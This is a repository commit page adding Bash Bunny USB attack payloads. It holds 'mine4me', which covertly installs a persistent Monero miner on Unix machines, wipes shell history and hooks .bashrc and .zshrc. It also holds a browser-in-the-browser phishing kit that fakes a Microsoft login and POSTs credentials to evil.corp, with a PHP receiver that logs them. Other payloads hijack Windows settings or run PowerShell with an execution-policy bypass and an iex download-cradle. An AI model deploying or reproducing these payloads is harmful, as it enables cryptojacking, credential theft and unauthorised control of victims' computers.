hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

Browse Source
This commit is contained in:
0iphor13 2022-07-02 17:34:24 +02:00
commit 7cd924d77b
27 changed files with 1391 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
payloads/library/execution/mine4me/README.md Normal file
View File

@ -0,0 +1,41 @@
## About:
* Title: mine4me
* Description: mine4me make your target's system mine Monero for you.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution
* Target: Unix-like operating systems.
* Attackmodes: HID, Storage
## mine4me: mine4me payload makes your target system mine Monero for you. Spread payload in multiple systems to acquire more Monero.
### Features:
* Autostart mining if Internet is connected.
* Fully covert.
* CPU/GPU mining.
* Persistent.
* Autostart payload on trigger.
* Intelligently manages processes.
### Changes to be made in mine4me/systemIn/config.json:
* MANDATORY: Enter your wallet address on line no `136`.
* Change mining pool(Default pool: `pool.hashvault.pro:443`) on line no `135`.
* Default configuration is for CPU mining for four threads, Can be configured in Block starting from line no `28` to `111`.
* Change number of threads assigned for mining at line no `105`.
* GPU mining can be enabled if you know hardware of target's system. OpenCL/CUDA required.
* For AMD GPU replace `"enabled": false,` with `"enabled": true,` at line no `113`.
* For NVIDIA GPU replace `"enabled": false,` with `"enabled": true,` at line no `122`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| mine4me/ | /payloads/library/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n

10
payloads/library/execution/mine4me/mine4me/payload.sh Normal file
View File

@ -0,0 +1,10 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/payloads/library/mine4me/systemIn /var/tmp/.system/systemIO
chmod +x /var/tmp/.system/systemIO/systemIO
cp -r $mntt/payloads/library/mine4me/shell /tmp/
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell

10
payloads/library/execution/mine4me/mine4me/shell Normal file
View File

@ -0,0 +1,10 @@
#!/bin/bash
ls -a ~/ | grep 'zshrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.zshrc
fi
ls -a ~/ | grep 'bashrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.bashrc
fi

175
payloads/library/execution/mine4me/mine4me/systemIn/config.json Normal file
View File

@ -0,0 +1,175 @@
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": false,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"argon2": [0, 2, 4, 6, 8, 10, 12, 14],
"astrobwt": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"astrobwt/v2": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"cn": [
[1, 0],
[1, 2],
[1, 8],
[1, 10]
],
"cn-heavy": [
[1, 0],
[1, 8]
],
"cn-lite": [
[1, 0],
[1, 2],
[1, 4],
[1, 6],
[1, 8],
[1, 10],
[1, 12],
[1, 14]
],
"cn-pico": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"cn/upx2": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"ghostrider": [
[8, 0],
[8, 2],
[8, 8],
[8, 10]
],
"rx": [0, 2, 8, 10],
"rx/arq": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"rx/wow": [0, 2, 4, 6, 8, 10, 12, 14],
"cn-lite/0": false,
"cn/0": false,
"rx/keva": "rx/wow"
},
"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"adl": true,
"cn-lite/0": false,
"cn/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn-lite/0": false,
"cn/0": false
},
"log-file": null,
"donate-level": 1,
"donate-over-proxy": 1,
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.hashvault.pro:443",
"user": "YOUR_WALLET_ADDRESS",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"enabled": true,
"tls": false,
"wss": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"retries": 5,
"retry-pause": 5,
"print-time": 60,
"health-print-time": 60,
"dmi": true,
"syslog": false,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"dns": {
"ipv6": false,
"ttl": 30
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false,
"pause-on-active": false
}

BIN
payloads/library/execution/mine4me/mine4me/systemIn/systemIO Normal file
View File

Binary file not shown.

56
payloads/library/execution/mine4me/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: mine4me
# Description: mine4me makes target's system mine crypto for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Unix-like operating systems.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 1400
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 200
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/mine4me/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1500
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

95
payloads/library/phishing/windows_browser-in-the-browser/README.md Normal file
View File

@ -0,0 +1,95 @@
# "Microsoft Windows" Browser in the Browser (BitB)
- Title: "Microsoft Windows" Browser in the Browser (BitB)
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Phishing
## Description
1) Hide "PowerShell" window.
2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
4) Copies and hides the phishing folder in the current user's directory.
5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
# Choose "dark" or "light"
#
readonly BITB_THEME="dark"
# Title of the window
#
readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
# URL in the address bar
#
readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
# Content of the navigation window
#
readonly BITB_TEMPLATE="microsoft-account.html"
# Destination of the form data
#
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
```
Example of code for the data receiver :
```php
<?php
if (
$_SERVER['REQUEST_METHOD'] === 'POST'
) {
$remote_addr = (string) $_SERVER['REMOTE_ADDR'];
$user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
$username_password = (string) implode(',', $_POST);
/*
touch ./aGFrNQ_loot.log
chown www-data:www-data ./aGFrNQ_loot.log
*/
$loot = fopen('aGFrNQ_loot.log', 'a');
fwrite($loot, "##\n");
fwrite($loot, $remote_addr . "\n");
fwrite($loot, $user_agent . "\n");
fwrite($loot, $username_password . "\n");
fwrite($loot, "##\n");
fclose($loot);
}
http_response_code(302);
header('Location: https://hak5.org/');
exit;
?>
```
## Screenshots
>
> Dark Theme
>
![bitb-dark](./readme_files/bitb-dark.png)
>
> Light Theme
>
![bitb-light](./readme_files/bitb-light.png)

55
payloads/library/phishing/windows_browser-in-the-browser/payload.ps1 Normal file
View File

@ -0,0 +1,55 @@
#
# Author: TW-D
# Version: 1.0
#
param (
[string] $BITB_THEME,
[string] $BITB_TITLE,
[string] $BITB_URL,
[string] $BITB_TEMPLATE,
[string] $DROP_URL
)
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
If ($BITB_THEME -And $BITB_TITLE -And $BITB_URL -And $BITB_TEMPLATE -And $DROP_URL) {
# Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
#
(powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)
# Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
#
(powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)
# Copies and hides the phishing folder in the current user's directory.
#
$random_name = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char] $_} ) )
$phishing_path = "${HOME}\${random_name}\"
Copy-Item -Path ".\phishing_files\" -Destination "${phishing_path}" -Recurse
(Get-Item "${phishing_path}" -Force).Attributes = "Hidden"
# Builds the configuration file for the phishing page.
#
"const BITB_THEME = '${BITB_THEME}';" | Out-File -FilePath "${phishing_path}TMP.js"
"const BITB_TITLE = '${BITB_TITLE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
"const BITB_URL = '${BITB_URL}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
"const BITB_TEMPLATE = '${BITB_TEMPLATE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
# Updating the destination of the form data.
#
(Get-Content "${phishing_path}templates\${BITB_TEMPLATE}") -Replace "--DROP_URL--", "${DROP_URL}" | Set-Content "${phishing_path}templates\${BITB_TEMPLATE}"
# Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
#
$phishing_path = ($phishing_path -Replace '[\\/]', '/')
& "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app="file:///${phishing_path}index.html" --kiosk --kiosk-idle-timeout-minutes=0 --edge-kiosk-type=fullscreen --no-first-run
}

103
payloads/library/phishing/windows_browser-in-the-browser/payload.txt Normal file
View File

@ -0,0 +1,103 @@
#!/bin/bash
#
# Title: "Microsoft Windows" Browser in the Browser (BitB)
#
# Description:
# 1) Hide "PowerShell" window.
# 2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
# 3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
# 4) Copies and hides the phishing folder in the current user's directory.
# 5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
# 6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
#
# Author: TW-D
# Version: 1.0
# Category: Phishing
# Target: Microsoft Windows
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# NOTE
# ===============
# Microsoft Edge is required on the target machine.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
# Choose "dark" or "light"
#
readonly BITB_THEME="dark"
# Title of the window
#
readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
# URL in the address bar
#
readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
# Content of the navigation window
#
readonly BITB_TEMPLATE="microsoft-account.html"
# Destination of the form data
#
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
######## ATTACK ########
LED ATTACK
Q DELAY 8000
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 4000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 3000
Q STRING "CD \"\${BB_VOLUME}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -BITB_THEME \"${BITB_THEME}\" -BITB_TITLE \"${BITB_TITLE}\" -BITB_URL \"${BITB_URL}\" -BITB_TEMPLATE \"${BITB_TEMPLATE}\" -DROP_URL \"${DROP_URL}\""
Q ENTER
Q DELAY 3000
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH
shutdown -h 0

40
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/css/main.css Normal file
View File

@ -0,0 +1,40 @@
#draggable {
font-family: "Segoe UI Light" !important;
}
#microsoft-logo {
height: 40px;
}
#title-text {
margin-left: 5px;
}
#minimize {
font-size: 20px;
}
#maximize {
font-size: 30px;
}
#container-minimize:hover, #container-maximize:hover {
opacity: 0.5;
}
#container-exit:hover {
background-color: red;
}
#exit {
font-size: 20px;
}
#ssl-logo {
height: 40px;
}
#phishing-iframe {
width: 100%;
height: 75vh;
}

7
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/framework/bootstrap.min.css vendored Normal file
View File

File diff suppressed because one or more lines are too long

1
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/framework/bootstrap.min.css.map Normal file
View File

File diff suppressed because one or more lines are too long

1
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/img/logo.svg Normal file
View File

@ -0,0 +1 @@
<svg enable-background="new 0 0 2499.6 2500" viewBox="0 0 2499.6 2500" xmlns="http://www.w3.org/2000/svg"><path d="m1187.9 1187.9h-1187.9v-1187.9h1187.9z" fill="#f1511b"/><path d="m2499.6 1187.9h-1188v-1187.9h1187.9v1187.9z" fill="#80cc28"/><path d="m1187.9 2500h-1187.9v-1187.9h1187.9z" fill="#00adef"/><path d="m2499.6 2500h-1188v-1187.9h1187.9v1187.9z" fill="#fbbc09"/></svg>
Side by Side

After

Width:  |  Height:  |  Size: 378 B

4
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/img/ssl.svg Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8"?>
<svg width="752pt" height="752pt" version="1.1" viewBox="0 0 752 752" xmlns="http://www.w3.org/2000/svg">
<path d="m510.97 316.8h-12.785l-0.003906-62.512c0-56.828-46.41-103.24-103.24-103.24h-37.887c-56.828 0-103.24 46.41-103.24 103.24v62.039h-12.785c-25.574 0-45.938 20.836-45.938 45.938v192.27c0 25.574 20.836 45.938 45.938 45.938h270.41c25.574 0 45.938-20.836 45.938-45.938l0.003906-191.8c0-25.574-20.836-45.938-46.41-45.938zm-195.12-62.512c0-22.73 18.469-41.203 41.203-41.203h37.887c22.73 0 41.203 18.469 41.203 41.203v62.039h-120.29z" fill="#A6A6B2"/>
</svg>
Side by Side

After

Width:  |  Height:  |  Size: 603 B

19
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/actions.js Normal file
View File

@ -0,0 +1,19 @@
var draggable;
draggable = document.querySelector('#draggable');
$('#draggable').draggable();
document.querySelector('#container-minimize').onclick = function() {
draggable.classList.remove('w-75');
draggable.classList.add('w-50');
}
document.querySelector('#container-maximize').onclick = function() {
draggable.classList.remove('w-50');
draggable.classList.add('w-75');
}
document.querySelector('#container-exit').onclick = function() {
draggable.style.display = 'none';
setTimeout(function() { location.reload(); }, 2000);
}

17
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/dispatch.js Normal file
View File

@ -0,0 +1,17 @@
var theme;
switch (BITB_THEME) {
case 'dark':
theme = ' bg-dark text-white';
break;
case 'light':
theme = ' bg-light text-dark';
break;
default:
theme = ' bg-dark text-white';
}
document.querySelectorAll('.row').forEach((row) => (row.className += theme));
document.querySelector('#title-text').innerText = BITB_TITLE;
document.querySelector('#url-input').value = BITB_URL;
document.querySelector('#phishing-iframe').src = ('./templates/' + BITB_TEMPLATE);

2
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/libraries/jquery-3.6.0.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

6
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/libraries/jquery-ui.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

46
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/index.html Normal file
View File

@ -0,0 +1,46 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" type="text/css" href="./assets/css/main.css?version=1.0.0" />
<link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?version=5.1.3" />
</head>
<body>
<main class="container w-50 mt-4 shadow" id="draggable">
<div class="row p-3 text-center rounded-top">
<div class="col-1 align-self-center">
<img id="microsoft-logo" src="./assets/img/logo.svg" alt="" />
</div>
<div class="col-8 align-self-center text-start">
<div class="fw-bold" id="title-text"></div>
</div>
<div class="col-1 align-self-center pt-3" id="container-minimize">
<div id="minimize">&#8212;</div>
</div>
<div class="col-1 align-self-center p-3" id="container-maximize">
<div id="maximize"></div>
</div>
<div class="col-1 align-self-center p-3" id="container-exit">
<div id="exit">X</div>
</div>
</div>
<div class="row p-3 text-center">
<div class="col-1 align-self-center">
<img id="ssl-logo" src="./assets/img/ssl.svg" alt="" />
</div>
<div class="col-11 align-self-center">
<input class="form-control" type="text" id="url-input" disabled />
</div>
</div>
<div>
<iframe id="phishing-iframe" frameBorder="0"></iframe>
</div>
</main>
<script type="text/javascript" src="./assets/libraries/jquery-3.6.0.min.js?version=3.6.0"></script>
<script type="text/javascript" src="./assets/libraries/jquery-ui.min.js?version=1.13.0"></script>
<script type="text/javascript" src="./assets/js/actions.js?version=1.0.0"></script>
<script type="text/javascript" src="./TMP.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/dispatch.js?version=1.0.0"></script>
</body>
</html>

495
payloads/library/phishing/windows_browser-in-the-browser/phishing_files/templates/microsoft-account.html Normal file
View File

File diff suppressed because one or more lines are too long

BIN
payloads/library/phishing/windows_browser-in-the-browser/readme_files/bitb-dark.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 354 KiB

BIN
payloads/library/phishing/windows_browser-in-the-browser/readme_files/bitb-light.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 352 KiB

51
payloads/library/prank/Win_HID_BeAPest/payload.txt Normal file
View File

@ -0,0 +1,51 @@
# Title: Be a pest using CLSID
# Description: Uses CLSID to open system dialogs to swap the left and right mouse button, change the region to Welsh and turn off system sounds.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows 10
# Attackmodes: HID
LED SETUP
ATTACKMODE HID
# GET SWITCH_POSITION
LED ATTACK
QUACK DELAY 200
# Swop Mouse buttons L <-> R
RUN WIN "shell:::{6C8EEC18-8D75-41B2-A177-8831D59D2D50}"
QUACK DELAY 200
QUACK SPACE
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Set region to Welsh
RUN WIN "shell:::{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}"
QUACK DELAY 200
# Walser (Switzerland)
QUACK w
QUACK DELAY 100
# Welsh
QUACK w
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Turn off system sounds
RUN WIN "shell:::{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}"
QUACK DELAY 200
QUACK SHIFT TAB
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK TAB
QUACK DELAY 100
QUACK UPARROW
QUACK DELAY 100
QUACK ENTER
LED FINISH

25
payloads/library/prank/Win_HID_BeAPest/readme.md Normal file
View File

@ -0,0 +1,25 @@
# Be A Pest Using CLSID
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10
- Category: General
- Attackmode: HID
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Uses CLSID to open system dialogs.
To swap the left and right mouse button.
Change the region to Welsh.
And turn off system sounds.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Keystrokes |
| FINISHED | Green blink followed by SOLID | Injection finished |

33
payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/payload.txt Normal file
View File

@ -0,0 +1,33 @@
#!/bin/bash
# Title: My Pictures 2 Ascii Art
# Description: Converts Jpeg, Png & BMP's in the My Pictures to ascii art versions.
# Author: Cribbit
# Version: 1.0
# Category: General
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
LED FINISH

23
payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/readme.md Normal file
View File

@ -0,0 +1,23 @@
# My Pictures 2 Ascii Art
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: General
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: Thinathayalan Ganesan & I am Jakoby
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Converts JPEG, PNG & BMP's in the My Pictures to ascii art versions.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

76
payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/s Normal file
View File

@ -0,0 +1,76 @@
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing");
$AsciiChars = @( 'M', '#', '@', '%', 'X', '=', '+', '*', ';', ':', '-', '.', ' ' )
Function PS-AsciiArt
{
[CmdletBinding()]
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path, [Switch] $Reverse
)
process
{
foreach($item in $Path)
{
if ($Reverse -eq $true)
{
[array]::Reverse($AsciiChars)
}
$sb = [System.Text.StringBuilder]::new()
# Convert path to BitMap
$name = (Get-Item $Item).fullname;
$Bitmap = [System.Drawing.Bitmap]::FromFile($name)
# Resize Image
$Bitmap = (Get-ReSizedImage $BitMap 100)
# draw every other line
$draw = $true;
# loop down the image
foreach($y in (0..($BitMap.Height-1)))
{
if ($draw)
{
foreach($x in (0..($BitMap.Width-1)))
{
# get pixal
$Pixel = $Bitmap.GetPixel($X,$Y)
$Grey = ($Pixel.R + $Pixel.G + $Pixel.B) / 3;
$grayColor = [System.Drawing.Color]::FromArgb($Grey,$Grey,$Grey);
if (!$toggle)
{
$index = (($grayColor.R * ($AsciiChars.count-1)) / 255);
[void]$sb.Append($AsciiChars[$index]);
}
}
[void]$sb.AppendLine('') #Start the next row
}
# flip bool
$draw = !$draw;
}
$sb.ToString() | Out-File ([io.path]::ChangeExtension($name, "ascii.txt"))
}
}
}
Function Get-ReSizedImage
{
param(
[System.Drawing.Bitmap] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Image, [int] [parameter(mandatory=$true)] $Width
)
Process
{
$asciiHeight=0;
#Calculate the new Height of the image from its width
$asciiHeight = [int][Math]::Ceiling([double]$Image.Height * $Width / $Image.Width);
#Create a new Bitmap and define its resolution
$result = New-Object System.Drawing.Bitmap($Width, $asciiHeight);
$g = [System.Drawing.Graphics]::FromImage([System.Drawing.Image]$result);
#The interpolation mode produces high quality images
$g.InterpolationMode = [System.Drawing.Drawing2D.InterpolationMode]::HighQualityBicubic;
$g.DrawImage($Image, 0, 0, $Width, $asciiHeight);
$g.Dispose();
return $result;
}
}
Get-ChildItem ([environment]::getfolderpath("MyPictures")) | ? {$_.extension -in ".jpg", ".jpeg", ".png", ".bmp"} |% {$_.FullName | PS-AsciiArt}